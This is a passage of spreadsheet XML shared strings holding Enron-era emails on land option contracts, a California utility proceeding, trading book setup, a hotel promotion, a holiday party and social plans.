    <t>Mon, 5 Jun 2000 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I'm glad to know I'm not the only one that's this sore.  We should be sore _x000D_
though.  We played 5 games.  And I played every second of every game.  Now _x000D_
don't you feel sorry for me?!</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 03:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Land Option Agreement/VEPCO</t>
  </si>
  <si>
    <t xml:space="preserve">see comments in brackets and caps.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Herman Manis/Corp/Enron@ENRON, Matthew Berry/HOU/ECT@ECT, Lisa _x000D_
Bills/Corp/Enron@ENRON, Roseann Engeldorf/Corp/Enron@ENRON_x000D_
cc: Heather Kroll/HOU/ECT@ECT _x000D_
Subject: Land Option Agreement/VEPCO_x000D_
_x000D_
FYI.  _x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 07/24/2000 10:08 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Heather Kroll@ECT_x000D_
07/21/2000 03:55 PM_x000D_
To: kraber@electricities.org, mscolo@poynerspruill.com_x000D_
cc: Ozzie Pagan/HOU/ECT@ECT, Jeffrey M Keenan/HOU/ECT@ECT, Kay _x000D_
Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: Land Option Agreement_x000D_
_x000D_
Gentlemen:_x000D_
_x000D_
Attached below please find what we hope to be the final option agreement.  _x000D_
All the changes should have been made.  I've blacklined the comments from Ken _x000D_
from this morning._x000D_
_x000D_
Ken, if this is acceptable, please call me and we will sned an executed _x000D_
document to you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Heather_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 02:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stacy@mslsearch.com', 'jeff.dasovich@enron.com', 'scottwl@hotmail.com', 'mollycoffin@hotmail.com', 'psellers@pacbell.net'})</t>
  </si>
  <si>
    <t>RE: bluegrass</t>
  </si>
  <si>
    <t>I suggest we meet at La Ginestra at 6:30 tomorrow night (its right next door_x000D_
so we'll be able to run over when it looks like we need to).  We should_x000D_
leave the city at 6pm and I told Molly that we would pick her up.  Whoever_x000D_
gets there first get a table for 7 (if Don is coming, Stacy)._x000D_
_x000D_
Can't wait!!_x000D_
_x000D_
-C_x000D_
_x000D_
_x000D_
Cameron Sellers_x000D_
Vice President, Business Development_x000D_
PERFECT_x000D_
1860 Embarcadero Road - Suite 210_x000D_
Palo Alto, CA 94303_x000D_
cameron@perfect.com_x000D_
650.798.3366 (direct dial)_x000D_
650.269.3366 (cell)_x000D_
650.858.1095 (fax)_x000D_
_x000D_
-----Original Message-----_x000D_
From:  Stacy Miller Azcarate [mailto:stacy@mslsearch.com]_x000D_
Sent: Monday, May 07, 2001 2:55 PM_x000D_
To: Cameron Sellers_x000D_
Subject: RE: bluegrass_x000D_
_x000D_
Yes. Let's go to La Ginestra right next door before. Say 7:30? It's fabulous_x000D_
Italian Food..._x000D_
_x000D_
-----Original Message-----_x000D_
From: Cameron Sellers [mailto:cameron@perfect.com]_x000D_
Sent: Monday, May 07, 2001 2:57 PM_x000D_
To: 'Stacy Miller Azcarate'_x000D_
Subject: RE: bluegrass_x000D_
_x000D_
_x000D_
Cool!!!  It's at 8:30 on Thursday and you can call to reserve tickets if you_x000D_
want (415-388-2820) but I am pretty sure it won't sell out.  They are a new_x000D_
band, but a bunch of people we know that are really good._x000D_
_x000D_
I can't wait to see you!!  Is there a good place to go to dinner before hand_x000D_
that you recommend?_x000D_
_x000D_
_x000D_
Cameron Sellers_x000D_
Vice President, Business Development_x000D_
PERFECT_x000D_
1860 Embarcadero Road - Suite 210_x000D_
Palo Alto, CA 94303_x000D_
cameron@perfect.com_x000D_
650.798.3366 (direct dial)_x000D_
650.269.3366 (cell)_x000D_
650.858.1095 (fax)_x000D_
_x000D_
-----Original Message-----_x000D_
From:  Stacy Miller Azcarate [mailto:stacy@mslsearch.com]_x000D_
Sent: Monday, May 07, 2001 2:49 PM_x000D_
To: Cameron Sellers_x000D_
Subject: RE: bluegrass_x000D_
_x000D_
Yes. yes. Yes. What time?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Cameron Sellers [mailto:cameron@perfect.com]_x000D_
Sent: Monday, May 07, 2001 2:48 PM_x000D_
To: 'Stacy Miller Azcarate'_x000D_
Subject: bluegrass_x000D_
_x000D_
_x000D_
Not sure if you are interested, but there is a fun bluegrass band playing at_x000D_
Sweetwater this Thursday night.  Since you are in the area it would be great_x000D_
to see you!!  Can you join us????_x000D_
_x000D_
_x000D_
Cameron Sellers_x000D_
Vice President, Business Development_x000D_
PERFECT_x000D_
1860 Embarcadero Road - Suite 210_x000D_
Palo Alto, CA 94303_x000D_
cameron@perfect.com_x000D_
650.798.3366 (direct dial)_x000D_
650.269.3366 (cell)_x000D_
650.858.1095 (fax)</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 11:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Consolidation of Three Utility Applications in 3rd Annual Tra_x000D_
 nsit ion Cost Proceeding ("ATCP")</t>
  </si>
  <si>
    <t xml:space="preserve">Jeanne hasn't been aware of SDG&amp;E's proposal to use overcollections from_x000D_
on-going CTCs to offset undercollections.  We would probably want to_x000D_
protest that issue._x000D_
---------------------- Forwarded by Mona L Petrochko/NA/Enron on 11/02/2000_x000D_
07:11 PM ---------------------------_x000D_
_x000D_
_x000D_
JMB &lt;JBennett@GMSSR.com&gt; on 11/01/2000 04:55:14 PM_x000D_
_x000D_
To:   "'mpetroch@enron.com'" &lt;mpetroch@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  FW: Consolidation of Three Utility Applications in 3rd Annual Tra_x000D_
nsit ion Cost Proceeding ("ATCP")_x000D_
_x000D_
Mona -- I know you are going to talk to the ARM members about SDG&amp;E's ATCP,_x000D_
so I thought you would be interested in this.  If Steve's proposal works,_x000D_
then ARM could get involved solely in the reasonableness part of SDG&amp;E's_x000D_
procurement practices, and not have to bother with the rest of their_x000D_
applications or the other two UDCs' ATCPs._x000D_
-_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Nelson, Steven C. [mailto:SNelson@sempra.com]_x000D_
Sent: Wednesday, November 01, 2000 11:11 AM_x000D_
To: abb@eslawfirm.com; anchau@shellus.com; aod@newsdata.com; aramo@ggu.edu;_x000D_
bdp@cpuc.ca.gov; bgaillar@enron.com; bho@cpuc.ca.gov; dfb@cpuc.ca.gov;_x000D_
dgrueneich@gralegal.com; dkk@eslawfirm.com; edf@cpuc.ca.gov;_x000D_
fosterbc@sce.com; furutanj@efawest.navfac.navy.mil; jlkm@pge.com;_x000D_
jmct@gmssr.com; jogg@jhenergy.com; jweil@aglet.org; karen@klindh.com;_x000D_
kmccrea@sablaw.com; kok@cpuc.ca.gov; kpoole@adamsbroadwell.com;_x000D_
lgurick@calpx.com; Lisa Hubbard; lohmanjk@sce.com; luluw@newsdata.com; Mark_x000D_
Ward; mlc0@pge.com; mrh2@pge.com; raw@cpuc.ca.gov; rliebert@cfbf.com;_x000D_
shotwejp@sce.com; Steven Nelson; theresa_mueller@ci.sf.ca.us; Thomas Whelan_x000D_
Subject: Consolidation of Three Utility Applications in 3rd Annual Transit_x000D_
ion Cost Proceeding ("ATCP")_x000D_
_x000D_
_x000D_
_x000D_
I'm sending this note on behalf of SDG&amp;E to inquire whether any_x000D_
parties have any objections to the consolidation of the Transition Cost_x000D_
Balancing Account ("TCBA") reasonableness portion of SDG&amp;E's 3rd Annual_x000D_
Transition Cost Proceeding ("ATCP") application with Edison's and PG&amp;E's_x000D_
3rd_x000D_
ATCP applications (A.00-09-014 and A.00-09-001) presided over by ALJ_x000D_
Patrick._x000D_
_x000D_
By way of background, some of you may know that SDG&amp;E filed its 3rd_x000D_
ATCP application one month later this year than Edison and PG&amp;E (10/2/2000_x000D_
instead of 9/1/2000) because the Commission directed SDG&amp;E to include_x000D_
testimony on the reasonableness of its energy procurement practices in its_x000D_
application in addition to testimony on TCBA reasonableness issues (that_x000D_
have been the subject of the "traditional" ATCP for the last couple of_x000D_
years)._x000D_
_x000D_
In ORA's protests to Edison's and PG&amp;E's 3rd ATCP applications, ORA_x000D_
requested that the Commission consolidate the three utilities' ATCP_x000D_
applications because "the policy questions raised by these applications are_x000D_
substantially similar for all three utilities [and] [t]he Commission can_x000D_
avoid much duplication of effort if the three applications are_x000D_
consolidated."  SDG&amp;E agrees with ORA's assessment.  Thus, at a prehearing_x000D_
conference scheduled Monday, November 6 at 2PM and presided over by ALJ_x000D_
Barnett, we are going to propose to ALJ Barnett that he (1) bifurcate_x000D_
SDG&amp;E's energy procurement reasonableness case from SDG&amp;E's TCBA_x000D_
reasonableness case and (2) transfer SDG&amp;E's TCBA reasonableness case to_x000D_
the_x000D_
TCBA reasonableness cases of Edison and PG&amp;E presided over by ALJ Patrick_x000D_
for ALJ Patrick's consideration of the consolidation request.  SDG&amp;E's_x000D_
energy procurement reasonableness case presumably would continue to be_x000D_
presided over by ALJ Barnett.  It is SDG&amp;E's understanding that ALJ Patrick_x000D_
has not yet convened a prehearing conference on Edison's and PG&amp;E's 3rd_x000D_
ATCP_x000D_
applications, so parties who wish to participate in the TCBA reasonableness_x000D_
cases will have the opportunity to do so._x000D_
_x000D_
I would appreciate your thoughts on this proposal.  Thanks.  Please_x000D_
call me if you have any questions.  My phone number is 619/699-5136._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'daniel.rogers@enron.com'})</t>
  </si>
  <si>
    <t>DPC LNG Supply Contracts Note</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
I've taken the liberty of suggesting some changes to the note.  Attached _x000D_
please find both "clean" and blacklined versions of my suggested revisions.  _x000D_
Please let me know if you have any questions or comments._x000D_
_x000D_
_x000D_
Kind regards,_x000D_
Dan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Mar 2002 06:11:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hotwiredeals@hotwire.m0.net'})</t>
  </si>
  <si>
    <t>Limited Time Deals on Portland Hotels!</t>
  </si>
  <si>
    <t>Hotwire INSIDER DEALS: Limited Time Hot-Rates(sm) for Portland hotels! &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259032X99199X&gt;_x000D_
_x000D_
Dear Matt,_x000D_
_x000D_
Want to get away without having to fly? Then take advantage of_x000D_
Hotwire's incredibly low hotel rates &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259032X99199X&gt; in Portland this spring. With_x000D_
the money you save on your hotel, you can enjoy Portland's fabulous_x000D_
shops (they're tax-free!), restaurants or brewpubs._x000D_
_x000D_
What's The Deal?_x000D_
Because vacancy rates in Portland are high, our _x000D_
quality hotelpartners &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259033X99199X&gt; have discounted their prices so you can get better than ever_x000D_
deals! Check out these recently booked Hot-Rates(sm) in Portland:*_x000D_
_x000D_
CITY (CITY AREA) - RATING - HOT-RATE - SAVINGS_x000D_
Portland (Beaverton - Hillsboro) - 2-star - $24 Hot-Rate - $25 Saved!_x000D_
Portland (Downtown - Conv. Ctr.) - 4-star - $45 Hot-Rate - $80 Saved!_x000D_
Portland (Jantzen Beach - Columbia River) - 3-star - $39 Hot-Rate - $65 Saved!_x000D_
Portland (Tigard) - 2-star - $30 Hot-Rate - $39 Saved!_x000D_
Portland (Portland Intl Airport) - 2.5-star - $39 Hot-Rate - $56 Saved!_x000D_
_x000D_
Get your own Portland Hot-Rate(sm) today! &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259032X99199X&gt;_x000D_
_x000D_
It's Easy to Get These Deals:_x000D_
To get your own amazing Hot-Rate(sm), just_x000D_
1) Visit Hotwire &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259032X99199X&gt;_x000D_
2) Select Portland, OR, in the "City" field_x000D_
3) Choose a check-in date between now and Memorial Day_x000D_
weekend (May 27th)_x000D_
4) Check up to four city areas in which you would like to stay_x000D_
(we have great deals in all Portland neighborhoods!)_x000D_
5) Click the "Continue" button and we'll show you our_x000D_
best deals!_x000D_
_x000D_
When you book a hotel on Hotwire, you're getting the best price --_x000D_
GUARANTEED. If you find a lower price anywhere else for the same_x000D_
hotel, we'll give you Double the Difference! &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259032X99199X&gt;**_x000D_
_x000D_
Share the Deals:_x000D_
Friends or family visiting Portland? Let them in on Hotwire's great_x000D_
hotel deals:_x000D_
&lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1256157X99199Xmatt.motley%40enron.com&gt;_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
_x000D_
QUESTIONS? Please contact support@hotwire.com &lt;mailto:support@hotwire.com&gt; or visit our _x000D_
CustomerCare &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259034X99199X&gt; section._x000D_
_x000D_
SUBSCRIPTION MANAGEMENT_x000D_
If you would like to change your email address or unsubscribe from_x000D_
receiving future Hotwire Insider Deals, visit the following URL:_x000D_
&lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1258927X99199Xmatt.motley%40enron.com&gt;_x000D_
_x000D_
Hotwire is committed to protecting your privacy. We do not sell, rent_x000D_
or give away any of your personal information. For more information,_x000D_
view our Privacy Policy &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259035X99199X&gt;._x000D_
_x000D_
* Actual hotel purchases made on Hotwire between 3/1/02-3/7/02. Hotel_x000D_
savings calculated against hotels' pre-tax published rate. Hotel_x000D_
rates do not include taxes and fees._x000D_
_x000D_
** Applies to hotel purchases only. Within 48 hours of the Hotwire_x000D_
purchase, customer must find a lower total pre-tax rate for an_x000D_
equivalent room type in the same hotel on the same dates. See details &lt;http://hotwire.m0.net/m/s.asp?HB5663453777X1259036X99199X&gt;._x000D_
_x000D_
? Hotwire 2000 - 2002. All rights reserved. Hotwire, Hot-Fares, Hot-_x000D_
Rates and the Hotwire logo are servicemarks of Hotwire. CST_x000D_
2053390-40._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;http://www.m0.net/m/logopen02.asp?vid=734&amp;catid=5663453777&amp;ecid=229379&gt;</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 03:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: The coldest weather . . .</t>
  </si>
  <si>
    <t>Holy cow!  Looks like we'll be playing a lot of board games in the condo._x000D_
LU-M_x000D_
----- Original Message -----_x000D_
From: &lt;Eric.Bass@enron.com&gt;_x000D_
To: &lt;shusser@enron.com&gt;; &lt;dfranklin@hanovermeasurement.com&gt;;_x000D_
&lt;Jason.Bass2@COMPAQ.com&gt;; &lt;daphneco64@bigplanet.com&gt;;_x000D_
&lt;lwbthemarine@bigplanet.com&gt;_x000D_
Sent: Monday, December 04, 2000 11:13 AM_x000D_
Subject: The coldest weather . . ._x000D_
_x000D_
_x000D_
&gt; . . . in the US in the last five years and we will be in the mountains to_x000D_
&gt; enjoy it.  Should be fun!!!   :-)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; http://www.weather.com/weather/cities/us_co_telluride.html_x000D_
&gt;</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 12:07:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.phillips@clarionenergy.com'})</t>
  </si>
  <si>
    <t>Corrected Post-AGA NYMEX straddles</t>
  </si>
  <si>
    <t>Sent wrong file previously-- We apologize</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 19:34:02 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: non payments from today</t>
  </si>
  <si>
    <t xml:space="preserve">FYI _x000D_
_x000D_
Bill (Bradford) and I have a plan but the number is a bit higher than we thought._x000D_
_x000D_
L_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Monday, November 26, 2001 9:33 PM_x000D_
To:	Milnthorp, Rob_x000D_
Subject:	non payments from today_x000D_
_x000D_
Rob, _x000D_
_x000D_
Let's discuss an action plan_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: adding new books/desks/counterparties in West Portfolio</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Valarie Sabo/PDX/ECT on 03/08/2001 01:21 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Nancy Hernandez @ ENRON                           03/01/2001 12:21 PM_x000D_
	_x000D_
_x000D_
To: Valarie Sabo/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: adding new books/desks/counterparties in West Portfolio_x000D_
_x000D_
Sorry:  LN skipped over your name in the send process._x000D_
---------------------- Forwarded by Nancy Hernandez/NA/Enron on 03/01/2001 _x000D_
02:20 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Nancy Hernandez                           03/01/2001 02:20 PM_x000D_
	_x000D_
_x000D_
To: Fran Chang/PDX/ECT@ECT_x000D_
cc: Chris Abel/HOU/ECT@ECT, Burton McIntyre/HOU/ECT@ECT, Susan D _x000D_
Trevino/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: adding new books/desks/counterparties in West Portfolio_x000D_
_x000D_
Valarie:_x000D_
_x000D_
Can you please complete the attached book request for the EPMI-ST-WR-EXT _x000D_
book?  If you have any questions please call me at 713-345-4751._x000D_
_x000D_
_x000D_
_x000D_
Nancy_x000D_
---------------------- Forwarded by Nancy Hernandez/NA/Enron on 03/01/2001 _x000D_
02:16 PM ---------------------------_x000D_
_x000D_
_x000D_
Fran Chang@ECT_x000D_
03/01/2001 01:14 PM_x000D_
To: Min Zheng/NA/Enron@Enron, Norman Lee/Corp/Enron_x000D_
cc: Sanjay Gupta/HOU/ECT, nancy.hernandez@enron.com, Valarie Sabo/PDX/ECT@ECT _x000D_
_x000D_
Subject: Re: adding new books/desks/counterparties in West Portfolio_x000D_
_x000D_
Hi Min Zheng and Norman:_x000D_
_x000D_
In the past couple of weeks you have been working on adding three new books _x000D_
(Short-term west rockies, Short-term west services, and Long-term west _x000D_
options) for the west.  Yesterday we entered/moved our exotic deal (deal # _x000D_
13982.3, which was originally in Short-term Southwest book) into the new _x000D_
Short-term west rockies book and we are seeing a couple of problems:_x000D_
_x000D_
(1) It seems that in DprAutomation the Short-term west rockies book was named _x000D_
as "ST-WROCK", rather than "ST-WR" (i.e. the book's/roll's name in _x000D_
M:\common\power\Postion\Dpr\2001\0102).  Therefore, last night and this _x000D_
morning we had to temparily changed the roll's name to ST-WROCK in order to _x000D_
allow DprAutomation to run through the roll to bring in P&amp;L/PCS/PID data.  _x000D_
(After DprAutomation was done running, we then changed it back to ST-WR so we _x000D_
can link the roll to the "pwrdpr" file).  _x000D_
_x000D_
=&gt; We need DprAutomation to use "ST-WR" for Short-term west rockies book so _x000D_
we won't have to change the file name everytime we run DprAutomation._x000D_
_x000D_
(2) As mentioned earlier, yeterday deal #13982.3 's desk was changed from _x000D_
ST-SW to Short-term west rockies in the Exotic book.  Although we officialize _x000D_
the Exotic book (post id 14061), Nancy Hernandez in Risk Management (Houston) _x000D_
found that they could not see the Short-term west rockies book officialized _x000D_
in Exotic.  _x000D_
_x000D_
=&gt; I am not sure if this is due to the same problem as in (1) or something _x000D_
else.  We need the new Short-term west rockies book set up right so it can be _x000D_
officialized in the Exotic book in order for the Risk Control Group in _x000D_
Houston to see/monitor it._x000D_
_x000D_
Please help us look at the above issues.  Let me know if I can provide more _x000D_
useful information._x000D_
_x000D_
(For Nancy:  I spoke with Valarie and there is nothing we know of other than _x000D_
deal #13982.3 that was in the ST-SW book in Exotic book.  Since we moved the _x000D_
deal to Short-term west rockies book last night, it should be normal to see _x000D_
nothing remaining in the ST-SW book.)_x000D_
_x000D_
Thanks,_x000D_
Fran_x000D_
x7973_x000D_
---------------------- Forwarded by Fran Chang/PDX/ECT on 03/01/2001 11:03 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Fran Chang_x000D_
02/09/2001 11:47 AM_x000D_
To: Norman Lee/Corp/Enron, Min Zheng/NA/Enron@Enron_x000D_
cc: Monica Lande/PDX/ECT@ECT, Valarie Sabo/PDX/ECT@ECT _x000D_
_x000D_
Subject: adding new books/desks/counterparties in West Portfolio_x000D_
_x000D_
Hi guys:  _x000D_
_x000D_
I just wanted to touch base with you on how we are doing on the IT side _x000D_
regarding the 3 new books that West Power is establishing (* please refer to _x000D_
the email attached from Val sent on 2/5/2001).  _x000D_
_x000D_
Today, we will be creating the three new desks/books (ST West Services, ST _x000D_
West Rockies, and LT West Options).  Would you please help us set up these _x000D_
three new desks/books in "West tot belden2".  The path to the file is _x000D_
M:\power2\Curve\New_sys\Data.  Specifically, when you open the file and go to _x000D_
"Peak", "Off-Peak", "Peak-By Region", and "Off-Peak-By Region" tabs, you will _x000D_
see pivot tables/columns which can be manupulated to get positions in our _x000D_
existing desks/books (eg. LT-NW, LT-SW, etc).  We need ST West Services, ST _x000D_
West Rockies, and LT West Options to be included in these tabs under seperate _x000D_
columns, too._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Fran_x000D_
x7973_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Fran Chang/PDX/ECT on 02/09/2001 11:50 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Valarie Sabo                           02/05/2001 11:57 AM_x000D_
	_x000D_
_x000D_
To: Samuel Schott/HOU/ECT@ECT_x000D_
cc: Chris Abel/HOU/ECT@ECT, Burton McIntyre/HOU/ECT@ECT, Susan D _x000D_
Trevino/HOU/ECT@ECT, Thresa A Allen/HOU/ECT@ECT, Duong Luu/HOU/ECT, Sanjay _x000D_
Gupta/HOU/ECT, LaCrecia Davenport/Corp/Enron@Enron, Misti Day/HOU/ECT@ECT, _x000D_
Michael Benien/Corp/Enron@ENRON, Will Smith/HOU/ECT, Norman Lee/Corp/Enron, _x000D_
Stacey W White/HOU/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT (bcc: Fran _x000D_
Chang/PDX/ECT)_x000D_
_x000D_
Subject: adding new books/desks/counterparties in West Portfolio_x000D_
_x000D_
Hello all.   I'm not sure if I've included too few people or too many, but _x000D_
you can let me know if I've left someone off the list or have included _x000D_
someone unnecessarily.  _x000D_
_x000D_
We're busy up here in Portland adding new desks...these new desks  will need _x000D_
to mapped through all of the Enpower reports/calcs, DPR, adhoc, MTM97, etc._x000D_
_x000D_
There are several of you that I will need to work with after the books are _x000D_
set up, but I think this gets us through the initial push.  Attached is the _x000D_
primary information on the new books.  Please email me or call if there are _x000D_
any questions._x000D_
_x000D_
I'd like to have the setup completed by Wednesday, Feb. 07, if possible._x000D_
_x000D_
Thanks!  _x000D_
_x000D_
Val at x7756_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Jun 2000 12:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Files, Directories, etc. on S:\</t>
  </si>
  <si>
    <t>All-_x000D_
_x000D_
Please inform Esther Gerratt when you are setting up new files and _x000D_
directories on the S:\ relating to MG integration.  Currently, we have three _x000D_
folders (Mg, MG EOL, MG Pres).  _x000D_
_x000D_
Thanks- Eric</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 21:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">The Senate did not take up SBX 6 or SBX 33 prior to adjourning for the_x000D_
long weekend.  The next time the Senate will meet is on Tuesday at 10:00_x000D_
a.m.  I have attached the most recent versions of both bills._x000D_
_x000D_
http://info.sen.ca.gov/pub/bill/sen/sb_0001-0050/sbx1_6_bill_20010215_amended__x000D_
sen.pdf_x000D_
_x000D_
http://info.sen.ca.gov/pub/bill/sen/sb_0001-0050/sbx1_33_bill_20010215_amended_x000D_
_sen.pdf_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 08:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Turbine contracts</t>
  </si>
  <si>
    <t>Hi Lee, _x000D_
_x000D_
Pete Thompson is preparing the LV Co Gen break out contract based on the _x000D_
version generated last week that you and Bill Williams had agreed to (or so I _x000D_
think), but incorporating the AIP stuff where approproiate for the new _x000D_
turbines.  We need to have the Delta break out contract signed by April 11th, _x000D_
so I'm hoping to have the LV Co Gen contract today or early tomorrow for all _x000D_
to review.  That way, you can look at both at the same time, and sign both at _x000D_
the same time.  Pretty nifty! _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 10:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>2000 U.S. Collective Wisdom Portfolio (http: //psm20.mlpc.privnet._x000D_
 us.ml.com/logi</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/10/2001 _x000D_
06:39 PM ---------------------------_x000D_
_x000D_
_x000D_
"Walkup, David C (HOUSTONAS AS 582)" &lt;dwalkup@pclient.ml.com&gt; on 01/10/2001 _x000D_
11:39:57 AM_x000D_
To: "'Vincent Kaminski'" &lt;vkamins@enron.com&gt;_x000D_
cc:  _x000D_
Subject: 2000 U.S. Collective Wisdom Portfolio (http: //psm20.mlpc.privnet. _x000D_
us.ml.com/logi_x000D_
_x000D_
_x000D_
 &lt;&lt;2000 U.S. Collective Wisdom Portfolio.htm&gt;&gt;_x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
_x000D_
CAUTION: Electronic mail sent through the Internet is not secure and could_x000D_
be intercepted by a third party.  For your protection, avoid sending_x000D_
identifying information, such as account, Social Security or card numbers to_x000D_
us or others.  Further, do not send time-sensitive, action-oriented_x000D_
messages, such as transaction orders, fund transfer instructions, or check_x000D_
stop payments, as it is our policy not to accept such items electronicall_x000D_
_x000D_
 - 2000 U.S. Collective Wisdom Portfolio.htm_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 04:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: take a look</t>
  </si>
  <si>
    <t xml:space="preserve">I revised it in the text. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mollie Gustafson_x000D_
11/28/2000 11:07 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: take a look_x000D_
_x000D_
Kate, thanks for your review!  I need to send out right away, can we add some _x000D_
fun to this mundain (sp) note?_x000D_
_x000D_
_x000D_
The holiday party is this Saturday!  Please take a minute to review these _x000D_
last-minute details, guaranteed to make our holiday party an exercise in _x000D_
efficient merriness....._x000D_
_x000D_
1. Remember to RSVP.  If you have not done so, please see Kathy Axford or _x000D_
Anna Mehrer TODAY._x000D_
_x000D_
2. Parking will be provided free of charge. Upon your arrival, tell the _x000D_
bellhop you are an Enron guest.  Should you choose to park in the structure _x000D_
across Pine Street from the hotel, take the ticket to the front desk for _x000D_
validation._x000D_
_x000D_
3. Responsible drinking is encouraged.   Complimentary towncar services will _x000D_
be provided by our friend Elaina at IMAX Trans.  Please contact her before _x000D_
Friday to make arrangements. She can be reached at 503-358-7214, or via _x000D_
e-mail at _x000D_
imaxtrans@hotmail.com.  Please include your preferred pick-up time and _x000D_
address in the e-mail, and Elaina will schedule accordingly.  And remember - _x000D_
everyone's in the same holiday boat with an ever-increasing list of gifts to _x000D_
get, so your gratuity to the driver is appreciated._x000D_
_x000D_
4. Embassy Suites is offering rooms to Enron employees at a special rate of _x000D_
$125+tax on Saturday night.  A  breakfast buffet is included (as are those _x000D_
little bottles of shampoo and shower caps!).  Please call 503-279-9000 for _x000D_
reservations, and be sure to ask for the holiday rate._x000D_
_x000D_
Robert Hicks and his seven-piece swing band will provide the musical stylings _x000D_
for the evening, so don't forget to bring your dancing shoes. And our very _x000D_
own Fank Vickers, auctioneer extraordinaire, will once again bring the house _x000D_
to its knees for charity. Amen!_x000D_
_x000D_
Schedule of Events:_x000D_
6:00-6:45    Reception, hors d'oeuvre and hosted beverages_x000D_
6:45-8:00    Dinner Buffet_x000D_
8:00-9:00    Door Prizes and Auction_x000D_
9:00-11:30  Dance the night away......_x000D_
_x000D_
We are looking forward to a great time!_x000D_
_x000D_
If you have any questions or suggestions, please see your Assistant today._x000D_
_x000D_
Thanks._x000D_
_x000D_
Mollie_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>(MS-17) SWITCH OF LESSOR</t>
  </si>
  <si>
    <t xml:space="preserve">NYMEX Membership Services_x000D_
March 12, 2001_x000D_
Notice # MS-17_x000D_
_x000D_
_x000D_
SWITCH OF LESSOR_x000D_
_x000D_
Please be advised that effective with the close of business, March 12, 2001=_x000D_
,=20_x000D_
the following member(s) will switch their lessor within the Exchange:_x000D_
_x000D_
Glenn Rudolfsky (OAHU-4739)_x000D_
_x000D_
